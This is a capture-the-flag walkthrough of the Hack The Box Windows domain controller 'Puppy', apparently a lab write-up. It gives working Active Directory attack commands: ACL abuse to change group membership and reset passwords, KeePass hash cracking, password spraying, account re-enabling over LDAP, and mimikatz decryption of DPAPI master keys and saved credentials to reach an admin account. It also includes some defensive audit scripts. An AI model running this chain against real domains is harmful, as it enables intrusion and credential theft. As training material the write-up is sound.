Puppy HTB
Machine Information:
Puppy is a medium-difficulty Windows box.
As is common in real-life pentests, we start the Puppy box with credentials for the following account:
levi.james / KingofAkron2025!
Tools Used:
- nmap
- enum4linux
- NetExec
- Certipy
- Bloodhound
- ntpdate
- targetedKerberoast
- john / keepass2john
- evil-winrm
- pwsafe
- impacket
- samba-common-bin (net)
- ldapsearch
- ldapmodify
Walk-through:
Nmap Reconnaissance:
We start with a standard nmap scan to identify open ports, the services behind them and their versions.
nmap -A -vv -oA nmap/puppy 10.10.11.70
Output:
# Nmap 7.95 scan initiated Sat May 17 22:52:17 2025 as: /usr/lib/nmap/nmap --privileged -A -vv -oA nmap/puppy 10.10.11.70
Nmap scan report for 10.10.11.70
Host is up, received echo-reply ttl 127 (0.21s latency).
Scanned at 2025-05-17 22:52:17 EDT for 343s
Not shown: 985 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-18 09:52:52Z)
111/tcp open rpcbind syn-ack ttl 127 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
2049/tcp open nlockmgr syn-ack ttl 127 1-4 (RPC #100021)
3260/tcp open iscsi? syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=5/17%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=68294CB8%P=x86_64-pc-linux-gnu)
SEQ(SP=107%GCD=1%ISR=10B%TI=I%II=I%SS=S%TS=A)
SEQ(SP=FE%GCD=1%ISR=108%TI=I%II=I%SS=S%TS=A)
OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M53CNW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
Uptime guess: 0.294 days (since Sat May 17 15:54:45 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 62785/tcp): CLEAN (Timeout)
| Check 2 (port 58506/tcp): CLEAN (Timeout)
| Check 3 (port 26380/udp): CLEAN (Timeout)
| Check 4 (port 57090/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-05-18T09:55:02
|_ start_date: N/A
|_clock-skew: 7h00m02s
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 206.69 ms 10.10.14.1
2 207.32 ms 10.10.11.70
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 17 22:58:00 2025 -- 1 IP address (1 host up) scanned in 343.53 seconds
Based on the nmap results, the target is a domain controller for the 'PUPPY.HTB' domain, most likely running Windows Server 2022.
Enum4Linux Recon
To learn more about the environment and to verify the privileges of our initial-access account, we run enum4linux for a first pass:
enum4linux -u levi.james -p KingofAkron2025! -a puppy.htb
Enum4linux gives us a list of every user in the domain. The 'steph.cooper' account stands out immediately: there is also an admin account named 'steph.cooper_adm', and the two accounts might share credentials.
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[levi.james] rid:[0x44f]
user:[ant.edwards] rid:[0x450]
user:[adam.silver] rid:[0x451]
user:[jamie.williams] rid:[0x452]
user:[steph.cooper] rid:[0x453]
user:[steph.cooper_adm] rid:[0x457]
Enum4linux also lists the SMB shares. There is a custom DEV share that is worth a look once we have access to it.
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk DEV-SHARE for PUPPY-DEVS
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
From the AD group output, members of the 'DEVELOPERS' or 'SENIOR DEVS' groups are the most likely candidates for access to the DEV share.
Group: 'DEVELOPERS' (RID: 1113) has member: PUPPY\ant.edwards
Group: 'DEVELOPERS' (RID: 1113) has member: PUPPY\adam.silver
Group: 'DEVELOPERS' (RID: 1113) has member: PUPPY\jamie.williams
Group: 'Domain Users' (RID: 513) has member: PUPPY\Administrator
Group: 'Domain Users' (RID: 513) has member: PUPPY\krbtgt
Group: 'Domain Users' (RID: 513) has member: PUPPY\levi.james
Group: 'Domain Users' (RID: 513) has member: PUPPY\ant.edwards
Group: 'Domain Users' (RID: 513) has member: PUPPY\adam.silver
Group: 'Domain Users' (RID: 513) has member: PUPPY\jamie.williams
Group: 'Domain Users' (RID: 513) has member: PUPPY\steph.cooper
Group: 'Domain Users' (RID: 513) has member: PUPPY\steph.cooper_adm
Group: 'Enterprise Admins' (RID: 519) has member: PUPPY\Administrator
Group: 'Schema Admins' (RID: 518) has member: PUPPY\Administrator
Group: 'Group Policy Creator Owners' (RID: 520) has member: PUPPY\Administrator
Group: 'Domain Admins' (RID: 512) has member: PUPPY\Administrator
Group: 'HR' (RID: 1108) has member: PUPPY\levi.james
Group: 'Domain Guests' (RID: 514) has member: PUPPY\Guest
Group: 'SENIOR DEVS' (RID: 1109) has member: PUPPY\ant.edwards
Group: 'Domain Controllers' (RID: 516) has member: PUPPY\DC$
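The group lines above follow a fixed "Group: '<name>' (RID: <n>) has member: <DOMAIN>\<user>" pattern, so they can be parsed rather than read by eye. The following is an added example (not part of the original writeup or of enum4linux) that turns that output into a membership map, lists the domain-created groups (RID 1000 and above), resolves who can reach the DEV share via DEVELOPERS or SENIOR DEVS, and flags standard/admin account pairs such as steph.cooper and steph.cooper_adm, which is exactly the tier-separation question an auditor would want to check for password reuse. The sample input is a constructed subset of the lines shown above.

```python
import re

# Constructed sample in the enum4linux "Group: ... has member:" format
# (a subset of the lines shown above; not live output).
SAMPLE = """\
Group: 'DEVELOPERS' (RID: 1113) has member: PUPPY\\ant.edwards
Group: 'DEVELOPERS' (RID: 1113) has member: PUPPY\\adam.silver
Group: 'Domain Users' (RID: 513) has member: PUPPY\\steph.cooper
Group: 'Domain Users' (RID: 513) has member: PUPPY\\steph.cooper_adm
Group: 'Domain Admins' (RID: 512) has member: PUPPY\\Administrator
Group: 'HR' (RID: 1108) has member: PUPPY\\levi.james
Group: 'SENIOR DEVS' (RID: 1109) has member: PUPPY\\ant.edwards
"""

LINE_RE = re.compile(
    r"^Group: '(?P<group>[^']+)' \(RID: (?P<rid>\d+)\) has member: "
    r"(?P<domain>[^\\]+)\\(?P<user>\S+)$"
)


def parse_group_lines(text):
    """Return {group_name: (rid, set_of_members)} from enum4linux group output."""
    groups = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # banners and unrelated output are skipped
        rid = int(m.group("rid"))
        name = m.group("group")
        groups.setdefault(name, (rid, set()))[1].add(m.group("user").lower())
    return groups


def custom_groups(groups):
    """Groups with RID >= 1000 were created in this domain (not well-known/builtin)."""
    return sorted(n for n, (rid, _) in groups.items() if rid >= 1000)


def members_of(groups, *names):
    """Union of members across the named groups (e.g. who can reach a share)."""
    out = set()
    for n in names:
        if n in groups:
            out |= groups[n][1]
    return sorted(out)


def tiered_account_pairs(groups, suffix="_adm"):
    """Admin accounts that have a same-named standard account.

    These pairs are where password reuse across tiers should be audited."""
    users = set()
    for _, (_, members) in groups.items():
        users |= members
    return sorted(u for u in users if u.endswith(suffix) and u[:-len(suffix)] in users)


if __name__ == "__main__":
    g = parse_group_lines(SAMPLE)
    print("custom groups:", custom_groups(g))
    print("DEV share candidates:", members_of(g, "DEVELOPERS", "SENIOR DEVS"))
    print("tiered pairs to audit:", tiered_account_pairs(g))
```

The `_adm` suffix is an assumption about this domain's naming convention; other environments use prefixes such as `adm-` or `da-`, and the check should be adjusted to match whatever convention the organisation documents.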
Bloodhound
We will start our Bloodhound community instance:
sudo docker-compose -f /opt/bloodhoundce/docker-compose.yml up
We then use Levi's account to collect all the data in BloodHound-compatible format and upload it directly.
sudo bloodhound-ce-python -d puppy.htb -u levi.james -p 'KingofAkron2025!' -ns 10.10.11.70 -c all
Escalation Of Privilege:
As Levi is a member of the HR group, and HR has GenericWrite over the DEVELOPERS group, we can add Levi directly to the DEVELOPERS group.
net rpc group addmem "developers@puppy.htb" "levi.james" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S "puppy.htb"
We can then list the SMB shares and confirm that we can access the DEV share.
nxc smb puppy.htb -u levi.james -p KingofAkron2025! --shares
Output:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk DEV-SHARE for PUPPY-DEVS
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMBClient & KeePass Cracking
As we can access the DEV share, we can use smbclient to authenticate and view the contents of the SMB share.
smbclient //puppy.htb/dev -U levi.james%KingofAkron2025!
Output:
smb: \> ls
. DR 0 Tue May 20 14:20:39 2025
.. D 0 Sat Mar 8 11:52:57 2025
KeePassXC-2.7.9-Win64.msi A 34394112 Sun Mar 23 03:09:12 2025
Projects D 0 Sat Mar 8 11:53:36 2025
recovery.kdbx A 2677 Tue Mar 11 22:25:46 2025
The most notable item here is the recovery.kdbx file. This is a KeePassXC database, and we can download it directly.
get recovery.kdbx
We can use keepass2john to convert the recovery.kdbx file and output it to a hash.
~/modules/john/run/keepass2john recovery.kdbx > hash
From there we can run john to try and crack the KeePass hash using a common wordlist.
~/modules/john/run/john --wordlist=/usr/share/wordlists/rockyou.txt hash
Output:
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [AES/Argon2 128/128 SSE2])
Cost 1 (t (rounds)) is 37 for all loaded hashes
Cost 2 (m) is 65536 for all loaded hashes
Cost 3 (p) is 4 for all loaded hashes
Cost 4 (KDF [0=Argon2d 2=Argon2id 3=AES]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Note: Passwords longer than 41 [worst case UTF-8] to 124 [ASCII] rejected
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Failed to use huge pages (not pre-allocated via sysctl? that's fine)
liverpool (recovery)
1g 0:00:00:05 DONE (2025-05-21 02:04) 0.1686g/s 6.745p/s 6.745c/s 6.745C/s purple..123123
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The --show option confirms that the password for the recovery database is 'liverpool'.
~/modules/john/run/john hash --show
recovery:liverpool
We can then launch the keepass file and enter the recovered password.
keepassxc recovery.kdbx
Within the KeePass database file we identified the following credentials:
ADAM.SILVER:HJKL2025!
ANT.EDWARDS:Antman2025!
JAMIE.WILLIAMS:JamieLove2025!
SAMUEL.BLAKE:ILY2025!
STEVE.TUCKER:Steve2025!
Password Spraying
As we now have a number of usernames and passwords, we can compile them into lists and conduct a password spray.
nxc smb puppy.htb -u users -p passwords --continue-on-success --no-bruteforce
Output:
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\samuel.blake:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steve.tucker:Steve2025! STATUS_LOGON_FAILURE
We can verify that the credential pair ant.edwards:Antman2025! works.
Further Privilege Escalation
The ant.edwards account is a member of the SENIOR DEVS group, which has GenericAll over the adam.silver account.
We can therefore use net rpc to change adam.silver's password.
net rpc password "adam.silver" "newP@ssword2022" -U "puppy"/"ant.edwards"%'Antman2025!' -S "puppy.htb"
From there we can use evil-winrm to attempt to connect to the target machine with Adam's account.
evil-winrm -i 10.10.11.70 -u adam.silver -p newP@ssword2022
Output:
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
The evil-winrm connection fails because the account is disabled.
With ldapsearch we can look at the userAccountControl attribute directly.
ldapsearch -x -H ldap://10.10.11.70 -D "ant.edwards@puppy.htb" -w 'Antman2025!' -b "dc=puppy,dc=htb" "(sAMAccountName=adam.silver)" userAccountControl
# extended LDIF
#
# LDAPv3
# base <dc=puppy,dc=htb> with scope subtree
# filter: (sAMAccountName=adam.silver)
# requesting: userAccountControl
#
# Adam D. Silver, Users, PUPPY.HTB
dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
userAccountControl: 66050
# search reference
ref: ldap://ForestDnsZones.PUPPY.HTB/DC=ForestDnsZones,DC=PUPPY,DC=HTB
# search reference
ref: ldap://DomainDnsZones.PUPPY.HTB/DC=DomainDnsZones,DC=PUPPY,DC=HTB
# search reference
ref: ldap://PUPPY.HTB/CN=Configuration,DC=PUPPY,DC=HTB
# search result
search: 2
result: 0 Success
# numResponses: 5
# numEntries: 1
# numReferences: 3
Based on the ldapsearch result, userAccountControl is set to 66050.
userAccountControl is a bitmask, and the 'account disabled' flag has the value 2: disabling an ordinary account adds that bit to the current value, for example 514 (512 + 2).
To re-enable the account we clear that bit, giving 66048 (66050 - 2).
With ldapmodify we can set userAccountControl to 66048:
ldapmodify -x -H ldap://10.10.11.70 -D "ant.edwards@puppy.htb" -w 'Antman2025!' <<EOF
dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
changetype: modify
replace: userAccountControl
userAccountControl: 66048
EOF
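Since userAccountControl is a bitmask, the safe way to enable or disable an account is to set or clear the ACCOUNTDISABLE bit (0x2) with bit operations rather than adding or subtracting 2: subtracting 2 from an account that is already enabled would corrupt other flags. The following is an added example (not part of the original writeup) that decodes a userAccountControl value into its well-known flag names, pulls the value out of ldapsearch LDIF output, and builds the ldapmodify body used above; the SAMPLE_LDIF is a constructed fragment mirroring the output shown earlier.

```python
# Well-known userAccountControl bits (ADS_USER_FLAG values).
UAC_FLAGS = {
    0x0001: "SCRIPT",
    0x0002: "ACCOUNTDISABLE",
    0x0008: "HOMEDIR_REQUIRED",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0040: "PASSWD_CANT_CHANGE",
    0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x0100: "TEMP_DUPLICATE_ACCOUNT",
    0x0200: "NORMAL_ACCOUNT",
    0x0800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x20000: "MNS_LOGON_ACCOUNT",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
    0x4000000: "PARTIAL_SECRETS_ACCOUNT",
}
ACCOUNTDISABLE = 0x0002


def decode_uac(value):
    """Names of every flag set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def set_disabled(value, disabled):
    """Set or clear ACCOUNTDISABLE with bit operations, never with +2 / -2."""
    return (value | ACCOUNTDISABLE) if disabled else (value & ~ACCOUNTDISABLE)


def uac_from_ldif(ldif_text):
    """Pull the userAccountControl attribute out of ldapsearch LDIF output."""
    for line in ldif_text.splitlines():
        if line.startswith("userAccountControl:"):
            return int(line.split(":", 1)[1].strip())
    raise ValueError("userAccountControl not present in LDIF")


def ldif_enable_modify(dn, current):
    """Build the LDIF body that ldapmodify expects to re-enable an account."""
    new = set_disabled(current, False)
    return (f"dn: {dn}\nchangetype: modify\nreplace: userAccountControl\n"
            f"userAccountControl: {new}\n")


# Constructed sample mirroring the ldapsearch output above (not live output).
SAMPLE_LDIF = """\
dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
userAccountControl: 66050
"""

if __name__ == "__main__":
    v = uac_from_ldif(SAMPLE_LDIF)
    print(v, decode_uac(v))          # 66050 -> ACCOUNTDISABLE, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
    print(ldif_enable_modify("CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB", v))
```

On the defensive side, a change like this is visible: the domain controller logs Security event 4722 ("A user account was enabled") with the subject account that made the change, so an enablement performed by a non-administrative user such as ant.edwards is a strong signal to alert on.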
We can now use evil-winrm to remote onto the target device.
evil-winrm -i 10.10.11.70 -u adam.silver -p newP@ssword2022
Pivoting to another user account
In the C:\Backups directory we find a site backup archive.
cd C:\Backups
We can download the site backup zip file.
download site-backup-2024-12-30.zip
Unzipping it back on our attacking machine, we find a config file.
unzip site-backup-2024-12-30.zip
cat nms-auth-config.xml.bak
Output:
<server>
<host>DC.PUPPY.HTB</host>
<port>389</port>
<base-dn>dc=PUPPY,dc=HTB</base-dn>
<bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
<bind-password>ChefSteph2025!</bind-password>
</server>
After having a quick look at the config file we find the below credentials:
steph.cooper:ChefSteph2025!
We can use these credentials to remote onto the target device directly.
evil-winrm -i 10.10.11.70 -u 'steph.cooper' -p 'ChefSteph2025!'
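The backup above is a textbook case of a plaintext service credential surviving in a configuration file, hidden further by a .bak extension that most extension-based secret scanners ignore. The following is an added example (not part of the original writeup) of a small scanner a defender could run over an extracted backup: it sniffs file content rather than trusting extensions, parses anything that looks like XML, and reports elements whose tag name suggests a credential, masking the value so the report itself does not leak it. The sample config is constructed to mirror the layout of nms-auth-config.xml.bak with placeholder values.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

SECRET_TAG_RE = re.compile(r"(password|passwd|pwd|secret|token)", re.IGNORECASE)


def looks_like_xml(path):
    """Sniff content rather than trusting the extension (.bak, .old, .txt)."""
    try:
        with open(path, "rb") as f:
            head = f.read(512).lstrip()
    except OSError:
        return False
    return head.startswith(b"<")


def mask(value):
    """Keep the first two characters so a finding is recognisable but not reusable."""
    return value[:2] + "*" * max(len(value) - 2, 0)


def find_xml_secrets(xml_text):
    """Return [(tag, masked_value)] for elements whose tag name suggests a credential."""
    hits = []
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return hits  # not XML (or malformed): nothing to report from this parser
    for el in root.iter():
        text = (el.text or "").strip()
        if text and SECRET_TAG_RE.search(el.tag):
            hits.append((el.tag, mask(text)))
    return hits


def scan_tree(directory):
    """Walk an extracted backup and report every file carrying a plaintext credential."""
    findings = {}
    for dirpath, _, files in os.walk(directory):
        for name in files:
            path = os.path.join(dirpath, name)
            if not looks_like_xml(path):
                continue
            with open(path, "r", encoding="utf-8", errors="replace") as f:
                hits = find_xml_secrets(f.read())
            if hits:
                findings[os.path.relpath(path, directory)] = hits
    return findings


# Constructed sample mirroring the nms-auth-config.xml.bak layout above;
# host, DNs and the password are placeholders, not values from the box.
SAMPLE_CONFIG = """<server>
<host>DC.EXAMPLE.TEST</host>
<port>389</port>
<base-dn>dc=example,dc=test</base-dn>
<bind-dn>cn=svc-ldap,dc=example,dc=test</bind-dn>
<bind-password>PLACEHOLDER-bind-secret</bind-password>
</server>"""


def demo():
    """Write the constructed backup to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "nms-auth-config.xml.bak"), "w") as f:
            f.write(SAMPLE_CONFIG)
        with open(os.path.join(d, "notes.txt"), "w") as f:
            f.write("plain text, no xml here")
        return scan_tree(d)


if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, hits)
```

A finding like this should lead to rotating the bind account's password and, where the application supports it, replacing the static bind credential with a dedicated low-privilege service account; the backup itself should never sit on a share readable by ordinary domain users.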
Priv Esc Vectors
Steph Cooper doesn't have any additional access. It is important to note, however, that Steph Cooper also has an admin account, so any credentials shared across both accounts are a very likely privilege escalation vector.
Reading DPAPI with Mimikatz
We can attempt to privesc through DPAPI. After navigating to 'C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107' and running 'gci -force' we find the DPAPI master key file.
gci -force
Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:40 AM 740 556a2412-1275-4ccf-b721-e6a0b4f90407
-a-hs- 2/23/2025 2:36 PM 24 Preferred
We can use mimikatz to decrypt the DPAPI master key via RPC to the domain controller.
mimikatz.exe "dpapi::masterkey /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407 /rpc" "exit"
Output:
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # dpapi::masterkey /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407 /rpc
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {556a2412-1275-4ccf-b721-e6a0b4f90407}
dwFlags : 00000000 - 0
dwMasterKeyLen : 00000088 - 136
dwBackupKeyLen : 00000068 - 104
dwCredHistLen : 00000000 - 0
dwDomainKeyLen : 00000174 - 372
[masterkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : b23f3121344180480064e02b82150b9a
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : fb531b9368acdcf185c7f1e3f8d88318fe24ad0704732ef232fb626a50bcb897ecfdebf0982651eeaef634650c38cc3870e866f2b3ae02253946c2d2d9b883fe1fc0521f31606ad3f7cb9055281145af975fc142520a0187c8a155c884d46d73e2a7aa35d5ef0f81
[backupkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 820779384e02113e2f0fcd4e73ddb332
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : 27b10adc59892b80c774c4b7408c217db84b8a0b69b3b030b46bc00ec6043147dde0989c615265560d0de3efe2c2457e8959dd4bfcd973926c437a18a577a32da0ede777dd1fe5d0
[domainkey]
**DOMAINKEY**
dwVersion : 00000002 - 2
dwSecretLen : 00000100 - 256
dwAccesscheckLen : 00000058 - 88
guidMasterKey : {3ec516f3-8016-4236-bacf-b9a90ea50992}
pbSecret :
pbAccesscheck : 99db4e12dadb294b01fd2f6966463c541668845f73c9e2da25645258023bb6c8f580c8c03c93190c34633fef444fc426fb41e1b089756f8472793c4d46e89374864281312f72394e6d9afc5ebfa2c71cf5895c8962849aa4
Auto SID from path seems to be: S-1-5-21-1487982659-1829050783-2281216199-1107
[backupkey] without DPAPI_SYSTEM:
key : 1a943a912fa315c7f9eced48870b613d9e75b467d13d618bbad9262ef3f2c567
sha1: 469928729f9405d7ba46a22de53071b2e1d81fb9
[domainkey] with RPC
[DC] 'PUPPY.HTB' will be the domain
[DC] 'DC.PUPPY.HTB' will be the DC server
key : d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
sha1: 3c3cf2061dd9d45000e9e6b49e37c7016e98e701
mimikatz(commandline) # exit
Bye!
Now that we have the master key, we can look at the common credential locations to see whether any saved credentials exist for Steph Cooper's admin account.
1st Spot:
gci -force
Directory: C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 8:14 AM 11068 DFBE70A7E5CC19A398EBF1B96859CE5D
2nd Spot:
gci -force
Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:54 AM 414 C8D69EBE9A43E9DEBF6B5FBD48B521B9
3rd Spot:
gci -force
Directory: C:\Users\steph.cooper\AppData\Local\Microsoft\Vault
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/23/2025 2:36 PM 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
We can run the commands below to try to decrypt each credential file directly with the master key.
.\mimikatz.exe "dpapi::cred /in:C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D /unprotect /masterkey:d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84" "exit"
.\mimikatz.exe "dpapi::cred /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9 /unprotect /masterkey:d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84" "exit"
.\mimikatz.exe "dpapi::cred /in:C:\Users\steph.cooper\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 /unprotect /masterkey:d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84" "exit"
Eventually we get a hit on a credential.
We can see that steph.cooper did save the credentials for steph.cooper_adm.
Decrypting Credential:
* using CryptUnprotectData API
* masterkey : d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000c8 - 200
credUnk0 : 00000000 - 0
Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 3/8/2025 3:54:29 PM
unkFlagsOrSize : 00000030 - 48
Persist : 00000003 - 3 - enterprise
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:target=PUPPY.HTB
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : steph.cooper_adm
CredentialBlob : ****************
Attributes : 0
We can now directly access the device as Admin:
evil-winrm -i 10.10.11.70 -u steph.cooper_adm -p **********